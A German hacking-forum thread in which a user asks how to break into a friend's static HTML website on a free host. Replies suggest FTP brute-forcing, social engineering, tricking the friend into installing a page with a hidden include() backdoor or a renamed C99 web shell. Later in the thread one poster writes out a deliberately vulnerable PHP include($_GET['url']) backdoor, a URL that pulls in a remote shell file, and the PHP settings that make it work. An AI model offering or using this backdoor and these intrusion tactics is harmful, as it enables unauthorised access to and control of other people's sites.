Moin erstmal,

Bin neu hier im Forum, und möchte erstmal das geile Design lobben :P

Nun mein kleines Problem, nen Kumpel von mir hat eine Page online, und zwar per HTML gescripted einfach im Editor.. auf einem Freehoster wie z.b funpic in dem Fall ist es bplaced.net.

Unten habe ich ein paar Information beigefügt, aber ich würd das schon ganz gerne selber machen nun frag ich mit womit? wenn das jetzt webspell wäre oder so dann wäre das ja kein thema, dann könnt ich nen exploit usen oder sowas..
aber so habe ich absolut keine Ahnung.

Bitte um hilfe,
Gruß






Infos zu bplaced:

2 GB Speicherplatz für Deine Website
PHP5 | 8x FTP | 8x MySQL | 8x PostgreSQL
Unlimitierter Traffic & unbegrenzte Dateigröße

Hier z.b ein auszug von der Page:

<html>
<head>
<title>Homepage</title>


</head>


<frameset rows="15%,*,5%" color="*" frameborder="0" border="0" framespacing="0" >
<frame name="oben" src="oben.html" SCROLLING="NO" noresize>

<frameset cols="12%,*" frameborder="0" border="0" framespacing="0">
<frame name="links" src="links.html" SCROLLING="NO" noresize>
<frame name="mitte" src="mitte.html" SCROLLING="AUTO" noresize>

</frameset>
<frame name="unten" src="unten.html" noresize>

<no frames>
<body>
</body>
</no frames>
<!-- Beginn Zensurprotest v2.0 -->
<div id="zensur" style="position: absolute; left: 0; top: 0; width: 100%; height: 1500px !important; background-color: #000000 !important; text-align: center !important; color: #FFFFFF !important; font-family: Verdana,sans-serif; visibility: hidden; z-index: 100;">
<span style="font-size: 10px !important;">
<a rel="license" href="http://creativecommons.org/licenses/by/3.0/de/"><img alt="Creative Commons License" style="border-width:0" src="http://i.creativecommons.org/l/by/3.0/de/80x15.png" /></a> Dieses Werk von Patrick G. St&ouml;&szlig;er steht unter einer <a style="color: #FFFFFF !important;" href="http://creativecommons.org/licenses/by/3.0/de/">Creative Commons Namensnennung 3.0 Deutschland Lizenz</a> und beruht auf einem Inhalt unter <a style="color: #FFFFFF !important;" href="http://www.vorratsdatenspeicherung.de/content/view/158/79/#code">www.vorratsdatenspeicherung.de</a>.
</span>
<p style="display: block !important;">
<a href="javascript:HideZensur();" style="color: #FFFFFF !important; font-size: 16px; font-weight: bolder;"><img style="border: none; text-decoration: none;" src="http://www.stopp-seite.de/images/close.png" alt="Schlie&szlig;en" />Stopp-Seite schlie&szlig;en und weiter - Close and continue</a>
</p>
<p style="display: block !important;">
<a href="http://www.stopp-seite.de/"><img src="http://www.stopp-seite.de/images/z_black.png" style="border: none" alt="Stopp?" title="Stopp?" align="top" width="600" height="600" /></a>
</p>
<p style="display: block !important;">
<a href="javascript:HideZensur();" style="color: #FFFFFF !important; font-size: 16px; font-weight: bolder;"><img style="border: none; text-decoration: none;" src="http://www.stopp-seite.de/images/close.png" alt="Schlie&szlig;en" />Stopp-Seite schlie&szlig;en und weiter - Close and continue</a>
</p>
<p style="color: #FFFFFF !important; font-size: 16px; font-weight: bolder;">Trotz potenziell regierungskritischem Inhalt ist derzeitig das Aufrufen dieser Seite nicht illegal.</p>
</div>
<script type="text/javascript"><!--
function ShowHideZensur() {id="zensur"; obj = (document.getElementById ? document.getElementById(id) : (document.all ? document.all[id] : (document.layers ? document.layers[id] : null))); obj.style.visibility = (obj.style.visibility == 'visible' ? 'hidden' : 'visible');}; function HideZensur() {ShowHideZensur()}; if(document.cookie.indexOf('ZensurGesehen=1')==-1){ShowHideZensur()};
// -->
</script>
<!-- Ende Zensurprotest -->
</frameset>
</html>

Da es anscheinend nur in html geschrieben wurde, bleibt dir nur Social Engeneering, FTP Bruten oder FTP Exploiten.
Edit;//BLubB vertan :D

HTML ist eine Hypertext Markup Sprache.
Auf Deutsch der Text da wird in Graphiken umgewandelt.
Da kann man nix machen.
Mein Vorposter hat schon Möglichkeiten genannt wobei XSS ein Blödsinn ist da XSS durch PHP ausgelöst/ermöglicht wird.
Du könntest es natürlich noch mit Exploits versuchen.

//dit
1. Wozu brauchst du das??
2. Gib doch mal den Link her.

wie XXS wens reiner HTML code ist?

Ja, bruten könnte ich^^
aber wär übelst noob like oder nicht? xD

aber ich glaub ich sag ihm er soll für mich testweise webspell uploaden dann kann ich mitem exploit sein database haxorn.

Gruß

Nein, schick ihm doch eine nette index-Seite mit einer versteckten Datenbankabfrage oder einer versteckten include() Anweisung, dann kannst ganz einfach nachher drauf zurückgreifen...
Oder du sagst, das Webspell eine Lücke hat, er soll dir das Packet geben und du fügst irgendwo eine C99.pgp ein, natürlich mit einem anderen Namen :)

Was hat Bruteforcen (http://de.wikipedia.org/wiki/Brute-Force-Methode), mit "Noob Like" wie du es sagst zu tun? Du hast bei einer reinen HTML (http://de.wikipedia.org/wiki/Hypertext_Markup_Language)-Seite keine möglichkeit, an irgendwelche Daten ranzukommen, da HTML nur eine Auszeichnungssprache ist. Naja, selbst wenn er webSPELL auf seinem Webspace uploaden würde, müsstest du ersteinmal schauen das du für die entsprechende Version einen Exploit oder Lücke findest. Solltest du mal nachdenken, würde dich webSPELL auch nicht weiter bringen. ;)

Nein, schick ihm doch eine nette index-Seite mit einer versteckten Datenbankabfrage oder einer versteckten include() Anweisung, dann kannst ganz einfach nachher drauf zurückgreifen...


Hi,
that sounds good, hab grad mal geschaut aber wo finde ich denn einen solchen script für die datenbankabfrage, davon hab ich absolut keine Ahnung.

Was das brutforcen angeht, ja stimmt du hast recht is halt eine der wenigen Möglichkeiten, aber glaube das die anbieter bei einer bestimmten anzahl von falsch eingaben den acc. sperrt(kann ich mir zumd. gut vorstellen)

Würd mich auf ne antwort freuen,
gruß

Für eine include()-Anweisung sieht das ganze so aus.


<?php
include($_GET['url']);
?>So das ich dann per GET-Parameter die Seite einbinden kann.

http://127.0.0.1/index.php?url=http://webseite.de/shell.txtDazu müssen aber vorher die einstellungen


allow_url_fopen = on
allow_url_include = on
in PHP getroffen werden. Solltest du das ganze immer noch nicht so ganz verstehen schau dir mal am besten das ganze Tutorial zu RFI/LFI (http://free-hack.com/showthread.php?t=17105) an.

du bist n00blike ;)
was willste mit der datenbank wenn da garnix drauf is?
jaja, hauptsache einen auf 1337 hacker amchen